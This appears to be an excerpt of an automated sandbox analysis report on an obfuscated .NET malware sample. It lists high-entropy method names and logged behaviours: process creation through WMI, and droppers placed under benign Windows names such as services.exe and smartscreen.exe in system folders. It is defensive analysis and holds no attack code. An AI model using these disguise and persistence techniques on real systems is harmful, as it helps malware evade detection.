                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, WhEHpOv0boPT8eGIJYp.csHigh entropy of concatenated method names: 'y5EKqJcU8M67lK8euwMW', 'HZSekAcURVbim1ZrvhKW', 'Qec4XacUig3M28rlIv3M', 'xS4C07cUqS4tlyWro81P', 'XsUYlPcUksWCsOJq5lkV', 'ChSgO1cU7EUAsSJCP1oj', 'tknTEQcUwRFDSmyWixmw', 'MFRWbWcUNSBrH5uNDabm', 'p5vnbucUGYvsHYpWW3cs'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, UMHpdyjxqCNZV31CpBY.csHigh entropy of concatenated method names: 'hFKjlDYDZk', 'Njmjb9f1Ni', 'oPRjVbrIWa', 'pSnjMhcfr1', 'hMEjrM7CCd', 'fWPjpbhXIW', 'rS5jzYkmU5', 'Qr6jIMcHX09oLjhwXqPf', 'EJyrOScHY0QyLCrXLWlO', 'vH62sicHe5WjNeI6Dtfc'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, obcDLOnj7vbtu6hQlY0.csHigh entropy of concatenated method names: 'fgfnCAtHBD', 'i9xn2fWRKZ', 'Su3nFatkVw', 'WiiLZBcTtSAJJhfZgH5n', 'IIqBKJcT91wsEOHCCG2n', 'jQUDFCcTLrEtW8ipgWUN', 'PlcHgGcTN3lrjKMUWNqI', 'UKjPBUcTGgKNY9l2MvJE', 'AcUb1TcTkpW7HQREAJfH', 'nIDTD7cT77FiBQXSjM42'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, vj9dyPQlFGN0UBxb4v4.csHigh entropy of concatenated method names: 'CQqQV3mrFM', 'sB3vh9cYeZpr1b7nyQlL', 'sK96JdcYXhY8FMjkuZls', 'E726T5cYWsuD1axfQSiT', 'UFogRdcY47C00Mem7KqQ', 'F6sT6pcYZAumYJ3vCapc', 'I2Nt2wcYY5K3vYo0o7da'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, cFdnBba8LIfIQYvdkeT.csHigh entropy of concatenated method names: 'xL3arlOiDt', 'GZGap8HgNk', 'JhtazZjXpJ', 'kRq1CacexlTNdebCu8U4', 'ALwbjace7kOEvDDBtvul', 't2v4JicewKmCgHdlQ6Sk', 'Yr8aUfQuat', 'l1galgF2me', 'iZmabfJWyS', 'lxMHM8ceLEt5EK6J1gU0'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ke1GZ4nGQxBSINNVI2G.csHigh entropy of concatenated method names: 'YLpnrVE0XD', 'cDmnpv5Wb9', 'iF7nzqECjv', 'uPjBH7cZeKAlmwhdhS1t', 'XohWhVcZXQELJvIFXM7K', 'N2bBJCcZZtfQBCYbnRxe', 'IvWNancZYqdi879iwTyY', 'xyfQI4eXNN', 'nXERyjcZKNFeLWrAL6oc', 'nFvI7ocZ4cF8rsiK2ZeV'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Pa64kylFXTb0OwaendG.csHigh entropy of concatenated method names: 'BYklmtUKVG', 'x8olhSB45q', 'sEXlPoIPQB', 'xZslJHm3lR', 'RUnldBSJwK', 'V6ulSwge6G', 'E3oxiacMMCk3YWCyikl6', 'TmbSZ0cMrp7pxfI5U9nM', 'YatmWMcMpM1gxLaEVmOT', 'jWXpjtcMzFmksq0NvMO7'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, iDjJMkQH2MGOqBngfLS.csHigh entropy of concatenated method names: 'kgVQy7mpYd', 'rXSQvRpf5l', 'wYLQ9oi4W0', 'OcRQLcuOCf', 'vkeQt2oEW1', 'dGyQNA72be', 'PiNQGgbp6i', 'gJ3QkW0A5h', 'oVwQ7f4Itl', 'kweQwDtA5u'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, E616eyCBFhHL3u1dLa2.csHigh entropy of concatenated method names: 'Q6yCmtCS3i', 'ng8NJKcKVCs6wYn67ocg', 'x1bhSTcKlSIYWBIJ1rPr', 'OH2pYEcKbxK1xt4Te8aK', 'iTBGRGcKMY3AnpLOTP1m', 'XmOSdJcKrZA9i117n88y', '_53Y', 'd65', 'IUyca39gThU', 'tA6caAuOIlt'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, YiVGKvBiHVFbb9EU2Kc.csHigh entropy of concatenated method names: '_8X5', 'd65', 'wklcadwupjF', 'gkUcaSmFk4D', 'YKncjZQYM6F', 'QlCca54XJUB', 'R1DCUqcKAwmvrhf1RWsA', 'euXUfacKuBLTfyk5opJj', 'YvAS5mcKgwQRBQJplbdw', 'exsyIVcK3Gv89sbKqM84'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, x2LoY7nYwbfoJekm1rb.csHigh entropy of concatenated method names: 'NXenL68USI', 'EbgWGTcZmGIR6438XDa5', 'uGlt9ecZhXWdaRMd45QM', 'LroV3hcZFYL0hKt7Qynl', 'DnlDI2cZ1YSHtFvUWgbA', 'g9XnXkwm6m', 'c8EnWIGKV2', 'aVOn4KEVYv', 'YkOnHHZ5gE', 'AJpbsScZErVQwSTeeqas'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, tDW7Z8eXqgrF4F0LsU5.csHigh entropy of concatenated method names: 'j0Oe4AGdZ4', 'VV5eHnBRPY', 'uLBeKkgXcS', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'KIxeyBNphN'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, CIvvMaRaRMbCCkOnYvL.csHigh entropy of concatenated method names: 'ffgREWy8Fh', 'AuhR6FpAZ6', 'r6wRj1qdkd', 'EDZRBUHZrS', '_0023Nn', 'Dispose', 'wHXuyBcVIN1Vy3R52ZxQ', 'WnThhCcVQC3iPyCjg0qy', 'du09CxcVafOuUqHdLNFJ', 'pU5PVVcVECfr8OhX186D'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, k0TPDXdgUTiq0Vi7dX.csHigh entropy of concatenated method names: 't384PrKC6', 'SSZ5qGcob2jy09VYBcHv', 'fH2jAdcoVwogLEC1PG9L', 'exRsHKcoUD3CRymvFYcV', 'kCqCspcolSYG2PW0NfoV', 'yM5sLLXZP', 'jHZ0Td7Cc', 'DKxOR8IYB', 'FPIfwXDM5', 'zSqgYaGJ4'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, SRBtBrTCtCaESa4Asfp.csHigh entropy of concatenated method names: 'LgwTFupoXH', 'quET1FQrAa', 'MSbTmYraXR', 'wuky4vcwmeEIQTQMMjiC', 'lLIf6hcwFQDn5PXx10qc', 'U3bkkpcw1AQXD455FUAB', 'rsnfhucwhp8QxnMYuPCF', 'VjYCpOcwPHUvcEkFuv7M', 'z69sQrcwJnBcgfVGIwmS'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, xiZikDEkfM4nY1uA3vd.csHigh entropy of concatenated method names: 'OFx65qYstx', 'G8w6cYyQ99', 'uUp6n3mlAX', 'OJy5NGcWREkugpAeslEK', 'T6OnaFcWqwQMMSP2rYvj', 'ljKdTxcW8DwYZqWkksCF', 'IkUgYUcWUBH4gmkX0pEv', 'L7IEw1wh9j', 'x7lExlKbf9', 'nEeEiCUGG4'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, cKWhehdnnBj0kS8U3oE.csHigh entropy of concatenated method names: 'dIGddaXcqR', 'F5ldsHKKVr', 'JcGdaVVcVH', 'VvrdIdexU3', 'pdQdEIBqg8', 'EIsd6Xtjy7', 'UqKdjRZaGi', 'BPYdBXDnBy', 'j5ndCFavpF', 'Av1d2QutHn'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, VoXI4vYyyMSUKhy0DYx.csHigh entropy of concatenated method names: 'QYeY9I7LmX', 'AOPYLbr2fo', 'aOtYtUHVlN', 'EwOYNEQK41', 'fi1YGm7UWP', 'tcqdP4ciex3XCjhhBdZq', 'whVokjciXOZeA1uEndNP', 'EQq03sciWv45KSi4FGPY', 'eFor6yciZ3X1UClKeAPf', 'eCRFAMciYx6nZRmKAy5i'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, KUaS1sYQ5oeo9m2E6Rl.csHigh entropy of concatenated method names: 'rPUYITFpCh', 'absYE2Qb7k', '_7Bm', 'gZGY6YfQFo', 'sHBYjM1TSE', 'KPLYB6Y6m3', 'ddnYCMpYOm', 'DsUWLfcx8GHoAOPOs2F1', 'P4Oxt8cxiCA0VZhTwC0n', 'cbL9UfcxqP4Q6riSBDTJ'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, XUurxq2Y1cB8ZI47hZm.csHigh entropy of concatenated method names: 'jWU1sSH0kt', 'XUbO6CcvVUX1Qv5W6roP', 'npaRMCcvlth0IiHHnu4f', 'H0EhtKcvbCGmY57oT1ns', 'exo2XOiwBx', 'mFv2Wg2bhk', 'yCy24kkspf', 'JOL2HfcMSB', 'edP2KMZ8SU', 'uMN2y46Hbr'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, iCKCy8IwDt76LaggOgd.csHigh entropy of concatenated method names: 'iESIMxLQ8m', 'ofeIrlBn8K', 'yJiHmCcX9QZpubLonU57', 'f3SFCCcXyo03Ota9llct', 'OKkCkNcXvZivUBEmerAE', 'ACUEcQjyDv', 'PLN3LjcXGOdqNIUZnCVR', 'RXOfdGcXkJGnNXVsrmli', 'jf3YHpcXt6J2YG0A2Ses', 'vreR5xcXN0AxqLm2k5a9'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Qu7Ht6auEsDATYhrbGj.csHigh entropy of concatenated method names: 'RvXaDGTMm1', 'aeJaTlZvqL', 'jM4aZj3Bo8', 'etCaYAl3ZW', 'TKc6KecePFCRpjyg1x6r', 'j8eL6Scem8gOk7SsS3jD', 'R76gYccehvOlqQoT050N', 'ISXGXMceJ243MBSwsZLF', 'g5aTtWced4pVB9kxxeAq', 'UsCOjVceS45bJ7HjhVEY'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, WGon2r6WeNTqJpVZrm8.csHigh entropy of concatenated method names: 'qUR6wX1Pci', 'ona6xIghRQ', 'r9Z6iYi38t', 'E3MafEc4Wx68ZAZTxDWN', 'R75rEXc4eW5gAohN6s9W', 'adRcMic4XWvo8JImv5dc', 'Fu76HvMPuk', 'BW16KIV646', 'dM26yEGJbr', 'Xq26vsicpk'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, pF0hx6Hjmn4kLMcoVtQ.csHigh entropy of concatenated method names: 'D7vHCo2IXQ', '_64r', '_69F', '_478', 'lUvH22FFZJ', '_4D8', 'ysxHFAHnAY', 'S90H1vqaeP', '_4qr', 'ndBHmjdwWf'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, bfKgcwYkLOtU8pyxrPA.csHigh entropy of concatenated method names: 'AEm', 'by1', 'N4HYwOmVUG', 'uM7', '_197', 'rZu', 'Q1J', '_24u', 'U67', 'xj7'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, IVRLk08uBxQQfmoHbwu.csHigh entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'EL58DLfvr0', 'EeCkLpcbvegVoPKnssMf', 'Wnt3TAcb9DwBatToRJHY', 'si46tPcbL76ZLwvnkF7u', 'InTPc5cbtlsn2N2ZMYnb', 'BkkovScbN33yIqBETH5a', 'MBUeWYcbG9q92hXiKidq'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, R3iKOHyt4k6dij19OuW.csHigh entropy of concatenated method names: 'qY4yGeRVLR', 'ScIykZDOJL', 'Kd4y79FU7X', 'sgmywLS8TN', 'rDcyxjKaxC', 'aB3yiiv1rG', 'JNIyqN4RB2', 'f9oy8K4D4H', 'fQgyRnWXU0', 'OoZyUELuvS'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, kbeSHbcbP7TgUrSMLRg.csHigh entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'JhTcjs2RbqW', 'WpqcQq6pdkd', 'WoeqFgcTg9liumiJ5Gom', 'gp4YPBcT3jRbHgaC880a', 'vWEp8ycTApVp6wxOUieH'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, OhloWqaH0k64bJaj5nr.csHigh entropy of concatenated method names: 'cOWayh0CMm', 'n3yav4bI1u', 'C0ex3Nce37hAwKV2nlIK', 'n3lAaQcefJ74OhJDB59m', 'bItqtqcegenqq10KH3rY', 'cMB70cceAfF1ObYwUI0q', 'NikSoTceuWePJ6RDDi8g', 'nK4boiceo5tMcVuTrn4Q', 'LNTI3pceD1s8TP1YMreL', 'sD03BuceTt3xCgp2C4Lk'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ohpLCPhsKTWXJwbWTs5.csHigh entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'mIQhOBbe3W', '_947', 'JaDhftMOxQ', 'PAJhgKxNax', '_1f8', '_71D'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, UgMRZZns4wtckZuXnTx.csHigh entropy of concatenated method names: 'yLnnO2c3AR', 'uPZnfwVBIV', 'KervBpcTr2UKObuuuA7j', 'CgBbE8cTpc31feVqCevR', 'aFwiZacTzdpvYmW9hjGX', 'WmEWZMcZ5xabeH1CpefG', 'VGQpOWcZcocXJbmsu5NI', 't2EByvcZna342nJlC5AL'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, W1k2mxBzDArF4I73iff.csHigh entropy of concatenated method names: 'auFCEWVp0s', 'WHyD3VcKGukGbXDBXMXd', 'B91OY1cKtUyk5RlHDE7M', 'lf6P85cKNAR72UHxEGTp', 'Lt1XAScKkmWkEOprs4Bn', 'YTZHtAcK7QoWsXgcuKLR', 'eq7', 'd65', 'Y2FcaOfrVaq', 'BfPcafARyJi'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, itHyebT0nl9S5Ab29WC.csHigh entropy of concatenated method names: 'rIDTf96Dxx', 'rpuTg8hpm7', 'nPwT3YpqjC', 'ETpTAcOZZ5', 'JJWTuP4Gln', 'Ie3ToPEoQx', 'QhIreTcw303kNnRRKiKi', 'ASfPTecwANGRElVVHpVc', 'O8a60BcwuZWiuyC76r5b', 'hFukN0cwomYvL8MB99UM'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, y6SdyvR1pgFPfZy4he2.csHigh entropy of concatenated method names: 'YC0cEyuF9TS', 'oQccEvBSk6k', 'aigcE9ixo7d', 'CWWfcecVGlGFAoFus9pp', 'PA48alcVthWlvcLNtxQ3', 'qSLldpcVNtlWM7b7s3J9', 'zBu4hKcVkfA6xEdrK3H0', 'oQUcjwPqVZX', 'oQccEvBSk6k', 'HqrGHUcVwXqwcCqC9LqN'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, hyXP4rQr3N0L1RknB0o.csHigh entropy of concatenated method names: 'uOJah8xKnY', 'Mx0lq0ce5kLEY4Zlbvwq', 'FcVJwxcecB5tUttUPdmm', 'BldLcgcYpqCpOUnKOxcn', 'YBwZABcYz6tBeTnJZbkb', 'znuBxcceIFjf4cixYL30', 'R4FxeKceQyKudPVoyILY', 'sOi2ugceaR8lnrOZZGCY', 'GIUag2iAlo', 'iOp18BceBWekENvrP23k'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, hPEmm4hpiGTG0m3FtWc.csHigh entropy of concatenated method names: 'vdHP54uVyi', 'ksCPcaG7Gd', 'O3GPnCpUNv', 'jP1PQ4eKip', 'rktPafiAMF', 'OSxuW0cL2JYZLJZRWonf', 'udAPDKcLFUeSHWIWE9EM', 'j54jiBcL10inV9SsVeKk', 'Cs9ZUrcLmUbo1puB6apO', 'iZCfincLhJd7h0xJSUDo'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, LKs6oN2EZDwLovOvDAt.csHigh entropy of concatenated method names: 'eJ2dvFcvfY0BeWV5uFZZ', 'DBCUvQcvgjMRJi3Wl3fL', 'Ng0Z92cv3nHx08QvA8Nd', 'kBtZEycv0maUMZNvofZh', 'WGBvltcvOMVMfXyQaZm3', '_7kT', '_376', 'zZd2jrspgt', 'gHt2B9yMpN', '_4p5'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, RXBPJRTR9KQwfS5OqbV.csHigh entropy of concatenated method names: 'T70TlMwhbM', 'KGpTb7i3BM', 'EtZTVIoS9L', 'MD5TMDlp3e', 'iC3TramwTE', 'ehUTp2QLG1', 'PqrTzVfHNh', 'KvoZ5VtATH', 'gLHZcuYIKh', 'dWcZncsOBb'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, A3wUBqrGExQTPbxo4bu.csHigh entropy of concatenated method names: 'hT9cExUmTJ2', 'w4QcEi3lOUT', 'XoJcEqweSNF', 'DAYcE83KvDl', 'NprcERXna8I', 'bPGcEUfv4NY', 'tuMcElgD0Xj', 'uHrpBILWC9', 'rqQcEbhGyFu', 'nEccEVKqQtg'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Bi71ShduppjWkT5cnvN.csHigh entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, egHpKpIgw5bOjfUfipa.csHigh entropy of concatenated method names: 'GbXIHgaCHT', 'VvnIKqRcWf', 'CnFaT1cXohxvxMKUIwnu', 'QgvQewcXAjTvZcsf8gWD', 'dPpG5ecXu1bN8XPKCPFb', 'YaKtXkcXDa4NFMC1aPfB', 'lAVIAOpG4B', 'MOEIu5iQNG', 'q0ZIornn07', 'bvUIDXCEBR'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, iqjuC74x0i13RX6FWck.csHigh entropy of concatenated method names: '_25r', 'h65', 'D5D4qlDkEF', 'ysM48IjwIX', 'JnV4RA7aL8', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, iHPLl68VDOGCDvCHZ6g.csHigh entropy of concatenated method names: '_7as', 'dxy', '_8Kv', 'K5I8rnA6Eo', 'bPI8pGHKH3', 'Xg68zeGcMF', '_0023Nn', 'Dispose', 'GWHWHAcbrXjSAlKG84OJ', 'CQVNUAcbpGh5FptCLu2T'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, dh3eQ96lG2DqX94EbVp.csHigh entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'nq1ETfc4tHHNNgoC89gk', 'byIqG6c4NOBWjTnJXMrL', 'enegLkc4GDtg71R7Awwm', 'QSXh2Xc4kN1NdA2JfPsE'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, PHhC7Qco6mOG7NsiPsr.csHigh entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'AcXcjPie6k4', 'WpqcQq6pdkd', 'BpF9JDcDl8ptDv7OtR5B', 'XmPMwDcDbrv1NgohUrQY', 'RGPMKrcDV8XkgC12bcR8'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, iOsrfPPzmuigEX94j79.csHigh entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'CstJcswVAJ', 'Q16JnuPceN', 'gY2', 'rV4', '_28E'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, SvmySdXES8vhMY2GpH7.csHigh entropy of concatenated method names: 'zvB6fAcqq5i2HspxSyGy', 'dM3SpTcqxtf6xgAIYx85', 'x2WwPDcqiWQRwC2DiPDo', 'sDwl2Dcq8TXyPduqWBTA', 'mQIXjLYhv0', '_1R8', '_3eK', 'bPiXBJJ1yV', 'NlOXCPWvEG', 'YyxX2BntG4'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, R1cBgd1GuvyeX9LDdNS.csHigh entropy of concatenated method names: 'lri17VacgN', 'vtv1w3qgba', 'JlC1xi13F0', 'vvT1iPgMK2', 'hyj1qZMQWL', 'tN5ByGc92XMV2wl5A9LK', 'iB64MNc9BQgTkMiLsJPT', 'HDEgP8c9CTrc5W86Bf80', 'awT22Gc9FxbyXe9nZvdq', 'GJqKWhc91HqZI3rn5f0D'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, u1bu66CVTd4VsbN34B3.csHigh entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'xLfCrhwwr4', 'fovcjtEVRig', 'HMiCpNH3TB', 'BjvcjNPog1O', 'XhfvNFcy8rew1V25wiiW', 'PHsP66cyikAW9XmBaweH', 'TeZJmycyqShdRIOTuFfN'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, j7ykfrcxyddg3fxQIDN.csHigh entropy of concatenated method names: '_413', 'V29', '_351', '_2Q4', 'H7R', 'BMacjSZ1yAA', 'WpqcQq6pdkd', 'bh2rE4cTP3PJsDevGxlm', 'DAmrQLcTJGWlkxlBZL4D', 'Sh9VqWcTdDyu5IRDAAR8'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, AJRTsBVOnfdpTDlf5PX.csHigh entropy of concatenated method names: 'JUeRQicr4cXrJqF0Q5RJ', 'LSJk8BcrHrFSXY4IjDSr', 'qCMMM3S2Xx', 'g2PkA4cr9Gf6oM3v1AT7', 'AkfPmIcrL5RyVCbYsUai', 'KNymeZcrtFoSTuvIOVOw', 'YE2eDucrNLYiUfvvdnNc', 'f3pZ75crGiNSgfaFodTG', 'p6qaMIcrknQb7jeT07sM', 'YvruBucr7U2ZTCCOqedR'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, odkalleD3oqoITf0Iks.csHigh entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, zgfbu7IaeqnudEK7w9j.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'yI5IEhGKDE', 'G97I69pLR3', 'kKGIjmwJxq', 'tWFNYCceqrEsM7l5Pm4B', 'T1j1RSce82h9929QMxSa', 'bgIGbXceRx8u7OMCaxR5', 'vX9rJNceUFiOVPq985AY', 'vp5n2pcel3a1DoYHthAX'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, YmLJMZe58irPOL6ooWA.csHigh entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, sJ1x3GCPJuywchy7ZJu.csHigh entropy of concatenated method names: '_5t1', 'd65', 'McicaohkOCR', 'BgecaDn6YQS', 'TwmCdUjJaU', 'Iy9cjWNG6GW', 'QlCca54XJUB', 'iZmwWwcKzZP3C2kkCQ2L', 'bK5BK3cy5UvcQa5U0m2r', 'ktsVrHcycebvYTGqvaAD'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, YyUiGjI186Xf9tUDhO4.csHigh entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'ygHcjOrVr0S', 'BMecQzVJWth', 'jpEjLAcXnK46w1VXG3Oq', 'CoPvIXcXQU73pQFiHdHS', 'Dp5XQwcXajJZ86Vuk6qZ', 'MqQpKXcXIBPgS6IGw9iN', 'rpXMKRcXEK3KmUWEWBVQ'

                            Persistence and Installation Behavior

                            barindex
                            Creates processes via WMI
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Drops PE files with benign system names
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeJump to dropped file
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\JNOIyhEg.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Program Files (x86)\Windows NT\smartscreen.exeJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\syOLALyL.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\urdulIjK.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\lniDCMno.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\SVvXiHdY.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\WepxKXjB.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\rxSvtOmf.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile created: C:\Users\user\Desktop\QgDirqoj.logJump to dropped file
